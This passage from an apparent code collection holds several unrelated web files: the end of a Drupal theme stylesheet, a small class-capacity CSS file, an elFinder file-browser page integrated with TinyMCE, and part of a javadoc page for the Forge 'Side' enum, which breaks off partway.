rgba(0, 0, 0, 0); border-image: none; border-radius: 5px; border-style: solid; border-width: 0; } .pager li.pager-last, .pager li.pager-next.last { border-right: 0 none; position: absolute; right: 30px; top: 0; } tr:hover td, tr.even:hover td.active, tr.odd:hover td.active { background: none; } .pager li.pager-first a, .pager li.pager-previous a, .pager li.pager-next a, .pager li.pager-last a .pager li.pager-last, .pager li.pager-next.last, .pager li.first, .pager li.first a, .pager li.first a:hover { background: none repeat scroll 0 0 rgba(0, 0, 0, 0); float: left; margin-left: 5px; position: relative; } .item-list .pager li, .item-list .pager ul li { border:none; } /*///////////////////////////////////////////*/ /* FRONT PAGE NEWS ITEMS */ /*///////////////////////////////////////////*/ #block-views-front-page-news-items-block { margin: 0 10px; padding: 10px 0 0; } #block-views-front-page-news-items-block .views-row { margin: 0 0 20px; } #block-views-front-page-news-items-block .views-field.views-field-field-image { float: left; margin: 5px 10px 20px 0; width:50px; } #block-views-front-page-news-items-block .views-field.views-field-body { font-size: 12px; margin-top: 5px; } #block-views-front-page-news-items-block .views-field.views-field-title a { font-size: 20px; padding-bottom: 5px; color:#e51837; font-weight:bold; letter-spacing:1px; } #block-views-front-page-news-items-block .views-field-created { color:#e51837; font-style:italic; } .watch-live { margin:10px 0px; } .watch-live a { -webkit-appearance: none; -moz-border-radius: 11px; -webkit-border-radius: 11px; -moz-background-clip: padding; -webkit-background-clip: padding; background: none repeat scroll 0 0 #e51837; border: medium none; border-radius: 5px; color: #fff; cursor: pointer; float: left; outline: 0 none; overflow: visible; padding: 25px 0; text-shadow: none; width: 100%; *padding-top: 2px; /* IE7 */ *padding-bottom: 0px; /* IE7 */ margin: 0 0 10px 0; font-size:18px; text-align: center; } /*///////////////////////////////////////////*/ /* ASK A QUESTION */ /*///////////////////////////////////////////*/ #question-node-form { } #edit-field-question textarea { /*resize:none; height:120px;*/ } .resizable-textarea .grippie { display:none; } #edit-preview.form-submit { display:none; } #question-node-form label { font-size:14px; } h1#page-title, h2.page-title { border-bottom: 2px solid #d9d9d9; color: #d9d9d9; font-size: 28px; font-weight: bold; margin: 0; } #question-eu-node-form .field-name-field-country, #question-node-form .field-name-field-country { font-style:normal; } /*///////////////////////////////////////////*/ /* FOOTER */ /*///////////////////////////////////////////*/ #zone-footer { color: #d9d9d9; padding: 10px 20px; } #zone-footer p { color: #d9d9d9; font-size:10px; } #region-footer-first { } #region-footer-first p { text-align: right; } #zone-footer-wrapper { background: none repeat scroll 0 0 #e51837; margin-top: 20px; } #zone-footer a, #zone-footer a:visited, #zone-footer a:link { color: #d9d9d9; text-decoration:underline; font-size:10px; } #zone-footer a:hover, #zone-footer a:active, #zone-footer a.active { color: #d9d9d9; text-decoration: none; } #block-block-4 { float:left; } #block-block-4 img { width: 40px; } #region-footer-second { text-align: right; } /*///////////////////////////////////////////*/ /* MODERATION & CHAIRMAN PAGES */ /*///////////////////////////////////////////*/ li.questions-item { background: none repeat scroll 0 0 #fff; margin: 0 0 10px; padding:10px; } .q-wrapper-chair-False, .q-wrapper-False-True, .q-wrapper-False-False { background: none repeat scroll 0 0 #fff; display: block; margin: 10px; padding: 10px; } .q-wrapper-True-False, .q-wrapper-True-False { background: none repeat scroll 0 0 #D4F6E3; /*light green*/ display: block; margin: 10px; padding: 10px; } .q-wrapper-True-True, .q-wrapper-chair-True { background:#fa7c8f; /*light red*/ display: block; margin: 10px; padding: 10px; color:#e51837; } .flag-wrapper { float: right; margin:5px 10px 10px; } .q-edit { margin: 5px 5px 5px 0; } .q-edit a.questions-edit { background: none repeat scroll 0 0 #e51837; border: 1px solid #e51837; border-radius: 5px; color:#fff; padding:5px 10px; } span.flag-wrapper a { background: none repeat scroll 0 0 #e51837; border: 1px solid #e51837; border-radius: 5px; color:#fff; } span.flag-wrapper.flag-approve {} span.flag-wrapper.flag-trash {} span.flag-wrapper.flag-checked {} span.flag-wrapper.flag-approve-comment a.unflag-action { background:green; } span.flag-wrapper.flag-delete-comment a.unflag-action { background:red; } span.flag-wrapper.flag-checked-comment a.unflag-action { background:green; } .submit-info, .submit-info a { font-style: italic; color:#e51837; } .q-asked { font-size:16px; } #region-content .q-asked p { color: #555450; } .view-display-comments .views-row { /*background: none repeat scroll 0 0 white;*/ width: 100%; } /* CHAIRMAN SPECIFIC STYLES*/ html.js body.html.not-front.logged-in.page-chair.context-chair.role-authenticated-user.role-chair { } .page-approved-questions span.flag-wrapper a, .page-chair span.flag-wrapper a { background: none repeat scroll 0 0 rgba(0, 0, 0, 0); border: medium none; color: #d9d9d9; font-size: 36px; } .page-approved-questions span.flag-wrapper.flag-checked-comment a.unflag-action, .page-chair span.flag-wrapper.flag-checked-comment a.unflag-action { background: none; border: medium none; color: #e51837; font-size: 36px; } .page-approved-questions #region-content, .page-chair #region-content {margin-top:10px;} .page-approved-questions #zone-branding, .page-chair #zone-branding { margin-bottom:0px; border:none; } .page-approved-questions #zone-header-wrapper, .page-chair #zone-header-wrapper {} /*.page-chair #region-header-first { border-bottom:2px solid #e51837; }*/ .page-approved-questions #zone-header, .page-chair #zone-header { border-bottom:2px solid #e51837; background:none repeat scroll 0 0 #e51837; padding-top: 7px; } h2.eu { font-size: 30px; font-weight: bold; text-align: center; text-transform: uppercase; color:#fff; } /* END */ .ajax-progress.ajax-progress-throbber, .ajax-progress.ajax-progress-throbber .message { display:none; } .page-chair li, .page-moderate li { list-style:none; } .role-moderator ul.tabs.primary.clearfix, .role-moderator .vertical-tabs { display:none; } ul.questions { margin: 10px; } ul.questions-controls { margin: 0; } .flag-wrapper a { padding: 5px; } li.questions-item .blockquote { background: none repeat scroll 0 0 #fff; margin: 10px 0; padding: 5px; } div.feed-icon { margin: 0 0 10px 10px; } /* EU QUESTION SPECIFIC STYLES */ .page-node-add-question-eu #region-content { margin: 10px; padding: 10px; } .page-node-add-question-eu h2.page-title { margin-left:0; } /* EVENT PAGES */ h3.event-sub { font-weight: bold; font-size:22px; } span.bold { font-weight: bold; } span.italic { font-style:italic; } .event p { margin: 0 0 0 20px; } .time { font-size: 14px; font-weight: bold; padding: 1px 0 0; vertical-align: top; } .event { } .event tr { padding: 10px 0 0; } .event h4 { border-bottom: 1px solid #e51837; margin-bottom: 20px; } .pop-out { margin: 20px 0; float:left; } .pop-out p { color: #e51837; text-align:center; } #edit-actions #edit-submit, .pop-out a { background: #d9d9d9; color: #e51837; font-weight: bold; } #edit-actions #edit-submit:hover, .pop-out a:hover { } .form-submit.ajax-processed { background: none repeat scroll 0 0 #d9d9d9; color: #e51837; } #views-exposed-form-user-data-page .form-submit, .view-user-data a.pop-out, .fieldset-wrapper .form-submit { background: #d9d9d9; color: #e51837; font-weight: bold; } #user-pass #edit-actions #edit-submit, #user-login #edit-actions #edit-submit, #user-register-form #edit-actions #edit-submit, #user-login-form #edit-actions #edit-submit{ background: #e51837; color: #d9d9d9; } .event iframe { max-width:100% !important; } #streamplayer { width: 100%; } #flashplayer { height: 0; width: 100%; padding-bottom: 56.25%; overflow: hidden; position: relative; } #flashplayer > div { width: 60%; margin: 1em auto; } #flashplayer .install-flash img { float: left; margin-right: 20px; } #flashplayer .native-stream { text-align: center; } #flashplayer .native-stream { text-align: center; } #flashplayer .native-stream a { cursor: pointer; color: blue; } #flashplayer .native-stream a:hover, #flashplayer .native-stream a.hover { text-decoration: underline; } #flashplayer object { width: 100%; height: 100%; position: absolute; top: 0; left: 0; } .views-row { } .views-row-odd { } .page-node-1 .views-row { width:100%; } .page-moderate .views-row, .page-chair .views-row { width:100%; margin:0; } a.views-more-link { color:#e51837; } #block-block-11 p { color:#d9d9d9; font-size: 14px; } .page-node-add-question-eu #block-block-11 p { margin-left:0px; } /* WELCOME PAGE */ .signature { float:left; margin-right:50px; } /* HCP POP UP */ #sliding-popup .popup-content #popup-buttons button { -webkit-appearance: none; -moz-border-radius: 11px; -webkit-border-radius: 11px; -moz-background-clip: padding; -webkit-background-clip: padding; background-clip: padding-box; border-radius: 5px; background: #e51837; border: none; border-color: none; cursor: pointer; color: #d9d9d9; outline: 0; overflow: visible; text-shadow: none; *padding-top: 2px; /* IE7 */ *padding-bottom: 0px; /* IE7 */ box-shadow:none; } #confirm-popup-buttons a:hover , #sliding-popup .popup-content #popup-buttons button:hover { background: #e51837; } #sliding-popup.sliding-popup-top { } #sliding-popup .popup-content { display: block; min-height: 60px; } #sliding-popup .popup-content #popup-text p { font-size: 12px; } .page-node-45#sliding-popup.sliding-popup-top { display:none; } /* EVENT PAGES */ .soon-come { background: none repeat scroll 0 0 #e51837; color: white; font-size: 24px; line-height: 30px; margin-top: -130px; padding: 50px 0; position: relative; text-align: center; top: 280px; z-index: 1000; } .form-item .description { color:#e51837; } .page-node-46 #block-block-11, .page-node-46 #block-block-8 { display:none; } .page-node-46 #block-block-12 { margin: 10px; } .node-type-abstract .pop-out { margin-right: 10px; } .page-node-46 #region-content, .page-node-53 #region-content { margin: 0; } #block-block-3 { padding: 20px 0 0; } #block-block-3 img { float: left; width: 100px; } #block-block-5 { float:left; padding: 20px 0 0; text-align: left; margin-top: 10px; } article#node-page-53 h2 { display:none; } #confirm-popup-text { text-align: center; padding-top:20px; } #confirm-popup-text p { font-size: 22px; color:#e51837; } #confirm-popup-buttons a { display: block; float: left; margin: 5%; padding: 20px 0; text-align: center; width: 40%; } article#node-page-53 { background:url("../../../../default/files/images/opaqueBGwhite.png") repeat scroll 0 0 rgba(0, 0, 0, 0); } .page-node-53 #region-postscript-second { display:none; } .item-list ul li { margin: 0; padding: 0; } #user-login, #user-register-form { background: none repeat scroll 0 0 #d9d9d9; margin-bottom: 0px; margin-top: 0; padding: 0; } ul.primary { background: none repeat scroll 0 0 #d9d9d9; margin: 0; padding: 20px 20px 4px; border-bottom: 2px solid #e51837; } ul.primary li a { padding: 5px 10px; border:none; background:none; } ul.primary li a:hover { background-color: #e51837; color:#d9d9d9; border-color: #e51837; } ul.primary li.active a { border-color: #e51837; color:#d9d9d9; background:#e51837; border-width:0px; } /* AGENDA TABLE OUTPUT */ #block-views-agenda-output-agenda-block { padding:10px; } .view-agenda-output { float:left; width:100%; } .view-agenda-output h2, .view-agenda-output h3 { color: #d9d9d9; } .view-agenda-output table { margin-top:20px; } .views-field-field-time-slot { width: 15% } .views-field-field-sessions {} .views-field-field-presenter {} #node-page-39 { display: none; } tr.even td { background: #e51837; } tr.odd td { background: none repeat scroll 0 0 #e74961; } thead th, th { background: none repeat scroll 0 0 #d9d9d9; border-bottom: 1px solid #d9d9d9; color: #e51837; text-shadow:none; } #question-node-form label { color:#d9d9d9; } #question-node-form .form-item .description { color: #d9d9d9; } #question-node-form .marker, .form-required { color: #d9d9d9; } .block h2.page-title { border-bottom: 2px solid #d9d9d9; color: #d9d9d9; font-size: 28px; font-weight: bold; margin: 0 0px 20px 0; } .page-node-add-question .block h2.page-title { margin-right: 0; } #question-eu-node-form .description { margin-top: 10px; color:#d9d9d9; } .page-node-add-question-eu #region-branding, .page-node-add-question-eu #region-branding-second { display:none; } .page-node-add-question-eu #zone-branding-wrapper { padding: 0; } .click-to-watch { background: none repeat scroll 0 0 #d9d9d9; border: 2px solid #e51837; display: block; font-size: 32px; padding: 20px 0; text-align: center; width: 100%; } a.fieldset-title { color: #d9d9d9; } #region-postscript-first .block { background: none repeat scroll 0 0 rgba(0, 0, 0, 0); float: right; margin: -20px 10px 0; padding: 0; } #views-form-user-data-page a { color: #d9d9d9; } .view-user-data .view-header { float: left; width: 100%; } .view-user-data .view-header > p { clear: both; float: left; } #edit-actionuser-block-user-action, #edit-rules-componentrules-link-set-unblock-users { margin-bottom: 20px; margin-right: 20px; } .page-node-207 ul li { color:#d9d9d9; font-size: 14px; } .page-node-207 a { color: #555450; } #block-webform-client-block-208 h2 { color:#d9d9d9; } #block-webform-client-block-208 .links { margin: 10px 0 20px; } #block-webform-client-block-208 .links a { background: none repeat scroll 0 0 #d9d9d9; font-weight: bold; padding: 10px; } #block-webform-client-block-208 .links a:hover { color: #e51837; } #block-webform-client-block-208 { padding-top: 0; } /* COMMENTS*/ .username { display:block; color: #e51837; -webkit-appearance: none; -moz-border-radius: 0; -webkit-border-radius: 0; border-radius: 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; -moz-background-clip: padding; -webkit-background-clip: padding; background-clip: padding-box; background-color: #fff; border: 1px solid; border-color: #848484 #c1c1c1 #e1e1e1; color: #000; outline: 0; padding: 2px 3px; font-size: 13px; font-family: Arial, sans-serif; height: 1.8em; *padding-top: 2px; /* IE7 */ *padding-bottom: 1px; /* IE7 */ *height: auto; /* IE7 */ } span.username { color: #e51837; } .role-authenticated-user .filter-wrapper { display: none } #edit-preview--2 { display: none; } .page-node-3 article h2 { display:none; } .page-user #region-content .block { } .password-strength-title { color: #d9d9d9; } .password-strength-text, div.password-confirm { color: #d9d9d9; } .reg-btn { background: none repeat scroll 0 0 #e51837; display: block; margin: 20px 0 0; padding: 14px 0; text-align: center; width: 100%; } a.reg-btn { color: #fff; font-weight: bold; text-transform: uppercase; } .pass-btn { float:right; } /* 1/12/14 */ .page-user .form-item .description { display: none; } .page-user-reset #region-content { background: none repeat scroll 0 0 #e51837; } .page-user-edit #region-content { background: none repeat scroll 0 0 #e51837; height: auto; } .page-user-edit #edit-field-first-name, .page-user-edit #edit-field-last-name, .page-user-edit #edit-field-academic-title, .page-user-edit #edit-field-country, .page-user-edit #edit-timezone { display:none; } div.form-item div.password-suggestions { background:#d9d9d9; } #edit-field-country-location .form-select { width:100%; } /* POLL EVERYWHERE */ .pe_multiple_choice_poll_10077397.peWidget .peHeader .peTitle { background: none repeat scroll 0 0 #e51837; color: #d9d9d9; padding: 0 !important; text-align: left !important; } .pe_multiple_choice_poll_10077397.peWidget .peMultipleChoicePoll .peBody { background: none repeat scroll 0 0 #e51837; color: #d9d9d9; } .pe_multiple_choice_poll_10077397.peWidget .peMultipleChoicePoll .peOptions a.peOption { background: none repeat scroll 0 0 #d9d9d9; color: #e51837 !important; margin-top: 5px; } .pe_multiple_choice_poll_10077397.peWidget .peHeader .peStatus, .pe_multiple_choice_poll_10077397.peWidget .peMultipleChoicePoll .peOptions a.peOption:hover { background:#555450 !important; color: #d9d9d9 !important; } .pe_multiple_choice_poll_10077397.peWidget .peMultipleChoicePoll .peChart .peChartBar { background: #d9d9d9 !important; color: #555450 !important; } /* END POLL EVERYWHERE */ /* LIVESTREAM PLAYER */ #livestream-player { width:100%; } #live-cast { height: 0; width: 100%; padding-bottom: 56.25%; overflow: hidden; position: relative; margin-bottom:20px; } #live-cast iframe { width: 100%; height: 100%; position: absolute; top: 0; left: 0; } /* END LIVESTREAM PLATYER */ article#node-webform-229 input#edit-previous.form-submit, article#node-webform-229 input#edit-next.form-submit { background:#d9d9d9; color:#e51837; } article#node-webform-229 input#edit-submit.form-submit { margin:0; } form#webform-client-form-229 .webform-component-webform_grid label { background: none repeat scroll 0 0 #d9d9d9; border-bottom: 3px solid red; color: #e51837; font-size: 18px; padding: 5px; } /* TRACKING PAGE */ .view-tracking .view-header > div, .view-tracking .view-header > section { background-color: #d9d9d9; } .view-tracking .view-header .tracking { padding: 0; } .view-tracking .view-header .left { display: inline-block; margin-right: 20px; margin-bottom: 20px; } .view-tracking .view-header .right { margin-bottom: 20px; display: table; } .view-tracking .view-header .half { width: 420px; } .view-tracking .view-header .quarter { width: 200px; } .view-tracking .view-header h2.block-title { font-size: 18px; line-height: 25px; margin: 5px; } .view-tracking #aps-geo-location { padding: 10px; } .view-tracking .view-header .view-display-id-online .view-content, .view-tracking .view-header .view-display-id-webcast .view-content { font-size: 65pt; line-height: 80pt; } .view-tracking .view-header .view-display-id-online .view-content .field-content, .view-tracking .view-header .view-display-id-webcast .view-content .field-content { margin: 0 10px; } .view-tracking .view-header .view-display-id-views .view-content ol { margin-bottom: 10px; } .view-tracking .view-header .view-display-id-views .view-content li { font-size: 10pt; line-height: 16pt; list-style: decimal; } /* responsive menu */ .responsive-menus.responsified span.toggler { background: none repeat scroll 0 0 #e51837; border-radius: 0; box-shadow: none; color: #fff; cursor: pointer; display: block; font-size: 1.35em; outline: medium none; padding: 10px; text-align: center; } .responsive-menus.responsified .responsive-menus-simple li a { border-bottom: 1px solid rgba(255, 255, 255, 0.5); color: #fff; display: block; margin: 0; padding: 1em 5%; text-align: left; text-decoration: none; text-transform: uppercase; background: none repeat scroll 0 0 #e51837; } .responsive-menus.responsified .responsive-menus-simple { box-shadow:none; }
SOFA/Content/class-capacity.css
School-Of-Future-Applications/SOFA
 .class-almost-full { background-color: #857296; color: white; } .class-full { background-color: #e46558; color: white; }
public/assets/elFinder/elfinder-tinymce.html
Gugis/laravel-cms
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>elFinder 2.0</title> <!-- jQuery and jQuery UI (REQUIRED) --> <link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.23/themes/smoothness/jquery-ui.css"> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script> <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.23/jquery-ui.min.js"></script> <link rel="stylesheet" href="css/common.css" type="text/css"> <link rel="stylesheet" href="css/dialog.css" type="text/css"> <link rel="stylesheet" href="css/toolbar.css" type="text/css"> <link rel="stylesheet" href="css/navbar.css" type="text/css"> <link rel="stylesheet" href="css/statusbar.css" type="text/css"> <link rel="stylesheet" href="css/contextmenu.css" type="text/css"> <link rel="stylesheet" href="css/cwd.css" type="text/css"> <link rel="stylesheet" href="css/quicklook.css" type="text/css"> <link rel="stylesheet" href="css/commands.css" type="text/css"> <link rel="stylesheet" href="css/fonts.css" type="text/css"> <link rel="stylesheet" href="css/theme.css" type="text/css"> <!-- elfinder core --> <script src="js/elFinder.js"></script> <script src="js/elFinder.version.js"></script> <script src="js/jquery.elfinder.js"></script> <script src="js/elFinder.resources.js"></script> <script src="js/elFinder.options.js"></script> <script src="js/elFinder.history.js"></script> <script src="js/elFinder.command.js"></script> <!-- elfinder ui --> <script src="js/ui/overlay.js"></script> <script src="js/ui/workzone.js"></script> <script src="js/ui/navbar.js"></script> <script src="js/ui/dialog.js"></script> <script src="js/ui/tree.js"></script> <script src="js/ui/cwd.js"></script> <script src="js/ui/toolbar.js"></script> <script src="js/ui/button.js"></script> <script src="js/ui/uploadButton.js"></script> <script src="js/ui/viewbutton.js"></script> <script src="js/ui/searchbutton.js"></script> <script src="js/ui/sortbutton.js"></script> <script src="js/ui/panel.js"></script> <script src="js/ui/contextmenu.js"></script> <script src="js/ui/path.js"></script> <script src="js/ui/stat.js"></script> <script src="js/ui/places.js"></script> <!-- elfinder commands --> <script src="js/commands/back.js"></script> <script src="js/commands/forward.js"></script> <script src="js/commands/reload.js"></script> <script src="js/commands/up.js"></script> <script src="js/commands/home.js"></script> <script src="js/commands/copy.js"></script> <script src="js/commands/cut.js"></script> <script src="js/commands/paste.js"></script> <script src="js/commands/open.js"></script> <script src="js/commands/rm.js"></script> <script src="js/commands/info.js"></script> <script src="js/commands/duplicate.js"></script> <script src="js/commands/rename.js"></script> <script src="js/commands/help.js"></script> <script src="js/commands/getfile.js"></script> <script src="js/commands/mkdir.js"></script> <script src="js/commands/mkfile.js"></script> <script src="js/commands/upload.js"></script> <script src="js/commands/download.js"></script> <script src="js/commands/edit.js"></script> <script src="js/commands/quicklook.js"></script> <script src="js/commands/quicklook.plugins.js"></script> <script src="js/commands/extract.js"></script> <script src="js/commands/archive.js"></script> <script src="js/commands/search.js"></script> <script src="js/commands/view.js"></script> <script src="js/commands/resize.js"></script> <script src="js/commands/sort.js"></script> <script src="js/commands/netmount.js"></script> <!-- elfinder languages --> <script src="js/i18n/elfinder.ar.js"></script> <script src="js/i18n/elfinder.bg.js"></script> <script src="js/i18n/elfinder.ca.js"></script> <script src="js/i18n/elfinder.cs.js"></script> <script src="js/i18n/elfinder.de.js"></script> <script src="js/i18n/elfinder.el.js"></script> <script src="js/i18n/elfinder.en.js"></script> <script src="js/i18n/elfinder.es.js"></script> <script src="js/i18n/elfinder.fa.js"></script> <script src="js/i18n/elfinder.fr.js"></script> <script src="js/i18n/elfinder.hu.js"></script> <script src="js/i18n/elfinder.it.js"></script> <script src="js/i18n/elfinder.jp.js"></script> <script src="js/i18n/elfinder.ko.js"></script> <script src="js/i18n/elfinder.nl.js"></script> <script src="js/i18n/elfinder.no.js"></script> <script src="js/i18n/elfinder.pl.js"></script> <script src="js/i18n/elfinder.pt_BR.js"></script> <script src="js/i18n/elfinder.ru.js"></script> <script src="js/i18n/elfinder.sl.js"></script> <script src="js/i18n/elfinder.sv.js"></script> <script src="js/i18n/elfinder.tr.js"></script> <script src="js/i18n/elfinder.zh_CN.js"></script> <script src="js/i18n/elfinder.zh_TW.js"></script> <script src="js/i18n/elfinder.vi.js"></script> <!-- elfinder dialog --> <script src="js/jquery.dialogelfinder.js"></script> <!-- elfinder 1.x connector API support --> <script src="js/proxy/elFinderSupportVer1.js"></script> <!-- elfinder custom extenstions --> <script src="extensions/jplayer/elfinder.quicklook.jplayer.js"></script> <!-- elFinder initialization (REQUIRED) --> <script type="text/javascript"> var FileBrowserDialogue = { init: function() { // Here goes your code for setting your custom things onLoad. }, mySubmit: function (URL) { // pass selected file path to TinyMCE parent.tinymce.activeEditor.windowManager.getParams().setUrl(URL); // close popup window parent.tinymce.activeEditor.windowManager.close(); } } $().ready(function() { var elf = $('#elfinder').elfinder({ // set your elFinder options here url: 'php/connector.minimal.php', // connector URL getFileCallback: function(file) { // editor callback // actually file.url - doesnt work for me, but file does. (elfinder 2.0-rc1) FileBrowserDialogue.mySubmit(file.url); // pass selected file path to TinyMCE } }).elfinder('instance'); }); </script> </head> <body> <!-- Element where elFinder will be created (REQUIRED) --> <div id="elfinder"></div> </body> </html>
1.7.10_Forge_Documents/cpw/mods/fml/relauncher/Side.html
Gullanshire/Minecraft_Mod-The_Exorcist
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Sun Jan 11 16:07:03 EST 2015 --> <title>Side (Forge API)</title> <meta name="date" content="2015-01-11"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Side (Forge API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../cpw/mods/fml/relauncher/ServerLaunchWrapper.html" title="class in cpw.mods.fml.relauncher"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../cpw/mods/fml/relauncher/SideOnly.html" title="annotation in cpw.mods.fml.relauncher"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?cpw/mods/fml/relauncher/Side.html" target="_top">Frames</a></li> <li><a href="Side.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#enum_constant_summary">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#enum_constant_detail">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">cpw.mods.fml.relauncher</div> <h2 title="Enum Side" class="title">Enum Side</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>java.lang.Enum&lt;<a href="../../../../cpw/mods/fml/relauncher/Side.html" title="enum in cpw.mods.fml.relauncher">Side</a>&gt;</li> <li> <ul class="inheritance"> <li>cpw.mods.fml.relauncher.Side</li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd>java.io.Serializable, java.lang.Comparable&lt;<a href="../../../../cpw/mods/fml/relauncher/Side.html" title="enum in cpw.mods.fml.relauncher">Side</a>&gt;</dd> </dl> <hr> <br> <pre>public enum <span class="strong">Side</span> extends java.lang.Enum&lt;<a href="../../../../cpw/mods/fml/relauncher/Side.html" title="enum in cpw.mods.fml.relauncher">Side</a>&gt;</pre> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== ENUM CONSTANT SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="enum_constant_summary"> <!-- --> </a> <h3>Enum Constant Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Enum Constant Summary table, listing enum constants, and an explanation"> <caption><span>Enum Constants</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Enum Constant and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../../cpw/mods/fml/relauncher/Side.html#CLIENT">CLIENT</a></strong></code> <div class="block">The client side.</div> </td> </tr> <tr class="rowColor"> <td class="colOne"><code><strong><a href="../../../../cpw/mods/fml/relauncher/Side.html#SERVER">SERVER</a></strong></code> <div class="block">The server side.</div> </td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>boolean</code></td> <td class="colLast"><code><strong><a href="../../../../cpw/mods/fml/relauncher/Side.html#isClient()">isClient</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>boolean</code></td> <td class="colLast"><code><strong><a href="../../../../cpw/mods/fml/relauncher/Side.html#isServer()">isServer</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../../cpw/mods/fml/relauncher/Side.html" title="enum in cpw.mods.fml.relauncher">Side</a></code></td> <td class="colLast"><code><strong><a href="../../../../cpw/mods/fml/relauncher/Side.html#valueOf(java.lang.String)">valueOf</a></strong>(java.lang.String&nbsp;name)</code> <div class="block">Returns the enum constant of this type with the specified name.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="../../../../cpw/mods/fml/relauncher/Side.html" title="enum in cpw.mods.fml.relauncher">Side</a>[]</code></td> <td class="colLast"><code><strong><a href="../../../../cpw/mods/fml/relauncher/Side.html#values()">values</a></strong>()</code> <div class="block">Returns an array containing the constants of this enum type, in the order they are declared.</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Enum"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Enum</h3> <code>clone, compareTo, equals, finalize, getDeclaringClass, hashCode, name, ordinal, toString, valueOf</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>getClass, notify, notifyAll, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ ENUM CONSTANT DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="enum_constant_detail"> <!-- --> </a> <h3>Enum Constant Detail</h3> <a name="CLIENT"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CLIENT</h4> <pre>public static final&nbsp;<a href="../../../../cpw/mods/fml/relauncher/Side.html" title="enum in cpw.mods.fml.relauncher">Side</a> CLIENT</pre> <div class="block">The client side. Specifically, an environment where rendering capability exists. Usually in the game client.</div> </li> </ul> <a name="SERVER"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>SERVER</h4> <pre>public static final&nbsp;<a href="../../../../cpw/mods/fml/relauncher/Side.html" title="enum in cpw.mods.fml.relauncher">Side</a> SERVER</pre> <div class="block">The server side. Specifically, an environment where NO rendering capability exists. Usually on the dedicated server.</div> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="values()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>values</h4> <pre>public static&nbsp;<a href="../../../../cpw/mods/fml/relauncher/Side.html" title="enum in cpw.mods.fml.relauncher">Side</a>[]&nbsp;values()</pre> <div 